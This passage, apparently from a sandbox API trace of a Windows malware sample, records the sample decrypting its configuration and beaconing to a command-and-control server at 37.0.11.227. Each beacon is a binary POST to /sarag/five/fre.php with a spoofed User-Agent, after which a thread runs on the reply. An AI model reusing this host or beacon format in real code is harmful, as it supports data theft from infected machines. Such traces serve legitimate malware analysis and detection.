CryptDestroyKey (hKey=0x69d628) returned 1 [0270.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.655] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0270.655] GetProcessHeap () returned 0x690000 [0270.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.659] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.660] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.661] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.662] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.662] GetProcessHeap () returned 0x690000 [0270.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0270.662] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.662] GetProcessHeap () returned 0x690000 [0270.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0270.663] GetProcessHeap () returned 0x690000 [0270.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.664] GetProcessHeap () returned 0x690000 [0270.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0270.664] GetProcessHeap () returned 0x690000 [0270.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0270.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0270.682] GetProcessHeap () returned 0x690000 [0270.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0270.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.684] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0270.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.685] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.686] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.686] GetProcessHeap () returned 0x690000 [0270.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0270.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.688] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0270.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.689] CryptDestroyKey (hKey=0x69d028) returned 1 [0270.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.693] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0270.693] GetProcessHeap () returned 0x690000 [0270.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.694] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0270.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.696] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0270.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.697] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0270.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.698] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0270.698] GetProcessHeap () returned 0x690000 [0270.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0270.698] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0270.698] GetProcessHeap () returned 0x690000 [0270.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0270.698] socket (af=2, type=1, protocol=6) returned 0x820 [0270.698] connect (s=0x820, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0270.723] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0270.723] GetProcessHeap () returned 0x690000 [0270.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0270.724] GetProcessHeap () returned 0x690000 [0270.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0270.724] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.725] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.725] GetProcessHeap () returned 0x690000 [0270.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0270.726] GetProcessHeap () returned 0x690000 [0270.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.726] GetProcessHeap () returned 0x690000 [0270.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0270.726] GetProcessHeap () returned 0x690000 [0270.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0270.727] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.728] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.728] GetProcessHeap () returned 0x690000 [0270.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0270.728] GetProcessHeap () returned 0x690000 [0270.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.729] send (s=0x820, buf=0x6ad508*, len=242, flags=0) returned 242 [0270.729] send (s=0x820, buf=0x6aba40*, len=159, flags=0) returned 159 [0270.729] GetProcessHeap () returned 0x690000 [0270.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0270.729] recv (in: s=0x820, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0270.836] GetProcessHeap () returned 0x690000 [0270.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0270.837] GetProcessHeap () returned 0x690000 [0270.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0270.837] GetProcessHeap () returned 0x690000 [0270.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0270.838] GetProcessHeap () returned 0x690000 [0270.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0270.838] closesocket (s=0x820) returned 0 [0270.839] GetProcessHeap () returned 0x690000 [0270.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0270.840] GetProcessHeap () returned 0x690000 [0270.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.840] GetProcessHeap () returned 0x690000 [0270.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0270.840] GetProcessHeap () returned 0x690000 [0270.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0270.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d4) returned 0x820 [0270.842] Sleep (dwMilliseconds=0xea60) [0270.843] GetProcessHeap () returned 0x690000 [0270.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0270.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.851] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0270.889] GetProcessHeap () returned 0x690000 [0270.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0270.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.890] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.891] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.892] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.893] GetProcessHeap () returned 0x690000 [0270.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0270.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.899] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0270.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.900] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.901] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0270.901] GetProcessHeap () returned 0x690000 [0270.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.902] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.903] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.904] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.905] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.905] GetProcessHeap () returned 0x690000 [0270.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.918] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.919] GetProcessHeap () returned 0x690000 [0270.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0270.919] GetProcessHeap () returned 0x690000 [0270.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.920] GetProcessHeap () returned 0x690000 [0270.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0270.921] GetProcessHeap () returned 0x690000 [0270.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0270.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0270.936] GetProcessHeap () returned 0x690000 [0270.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0270.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.938] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.939] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.941] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.942] GetProcessHeap () returned 0x690000 [0270.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0270.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.943] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0270.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.944] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.945] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0270.946] GetProcessHeap () returned 0x690000 [0270.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0270.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.948] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0270.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0270.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0270.950] GetProcessHeap () returned 0x690000 [0270.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.950] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0270.950] GetProcessHeap () returned 0x690000 [0270.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0270.951] socket (af=2, type=1, protocol=6) returned 0x824 [0270.951] connect (s=0x824, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0270.979] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0270.979] GetProcessHeap () returned 0x690000 [0270.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0270.979] GetProcessHeap () returned 0x690000 [0270.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0270.980] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.981] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.981] GetProcessHeap () returned 0x690000 [0270.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0270.982] GetProcessHeap () returned 0x690000 [0270.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.982] GetProcessHeap () returned 0x690000 [0270.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0270.982] GetProcessHeap () returned 0x690000 [0270.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0270.983] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.984] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.984] GetProcessHeap () returned 0x690000 [0270.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0270.984] GetProcessHeap () returned 0x690000 [0270.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.985] send (s=0x824, buf=0x6ad508*, len=242, flags=0) returned 242 [0270.985] send (s=0x824, buf=0x6aba40*, len=159, flags=0) returned 159 [0270.986] GetProcessHeap () returned 0x690000 [0270.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0270.986] recv (in: s=0x824, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0271.056] GetProcessHeap () returned 0x690000 [0271.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0271.056] GetProcessHeap () returned 0x690000 [0271.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0271.057] GetProcessHeap () returned 0x690000 [0271.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0271.058] GetProcessHeap () returned 0x690000 [0271.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0271.058] closesocket (s=0x824) returned 0 [0271.059] GetProcessHeap () returned 0x690000 [0271.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0271.059] GetProcessHeap () returned 0x690000 [0271.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.059] GetProcessHeap () returned 0x690000 [0271.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0271.060] GetProcessHeap () returned 0x690000 [0271.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0271.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d8) returned 0x824 [0271.062] Sleep (dwMilliseconds=0xea60) [0271.064] GetProcessHeap () returned 0x690000 [0271.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0271.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.065] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0271.083] GetProcessHeap () returned 0x690000 [0271.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0271.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.104] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.106] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.108] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.108] GetProcessHeap () returned 0x690000 [0271.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0271.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.110] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0271.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.111] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.112] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0271.112] GetProcessHeap () returned 0x690000 [0271.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.145] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.146] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.147] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.148] StrStrA 